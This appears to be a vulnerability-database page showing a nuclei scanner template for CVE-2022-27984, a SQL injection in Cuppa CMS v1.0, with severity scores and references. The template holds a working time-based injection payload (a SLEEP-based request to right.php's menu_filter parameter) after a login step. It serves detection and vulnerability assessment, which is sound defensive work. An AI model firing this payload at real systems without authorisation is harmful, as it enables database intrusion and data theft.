Lucene search

K

Cuppa CMS v1.0 - SQL injection

🗓️ 06 May 2023 12:20:12Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

Cuppa CMS v1.0 SQL injection via menu_filter parameter at /administrator/templates/default/html/windows/right.php. Leads to unauthorized access, data leakage, and potential CMS compromise

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2022-27984
26 Apr 202214:15
nvd
Prion
Sql injection
26 Apr 202214:15
prion
Cvelist
CVE-2022-27984
26 Apr 202213:58
cvelist
CNVD
CuppaCMS SQL Injection Vulnerability (CNVD-2022-63582)
28 Apr 202200:00
cnvd
CVE
CVE-2022-27984
26 Apr 202214:15
cve
id: CVE-2022-27984

info:
  name: Cuppa CMS v1.0 - SQL injection
  author: theamanrawat
  severity: critical
  description: |
    CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
  remediation: |
    Apply the latest patch or upgrade to a newer version of Cuppa CMS that addresses the SQL injection vulnerability (CVE-2022-27984).
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-27984
    - https://www.cuppacms.com/
    - http://cuppa.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-27984
    cwe-id: CWE-89
    epss-score: 0.02079
    epss-percentile: 0.89045
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cuppacms
    product: cuppacms
  tags: time-based-sqli,cve,cve2022,sqli,cuppa,authenticated,cuppacms

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        @timeout: 20s
        POST /templates/default/html/windows/right.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        menu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "components/menu/classes/functions.php")'
        condition: and
# digest: 4a0a0047304502203f49fb430c1ab52f4eb8b0405a4b87c64e38bd2a7941d591eca5157adadec7c0022100d22a5781a3be80671cb07f436473639ec123772516b98198c0ae4731ae159e01:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
06 May 2023 12:12Current
9.9High risk
Vulners AI Score9.9
CVSS27.5
CVSS39.8
EPSS0.025
9
.json
Report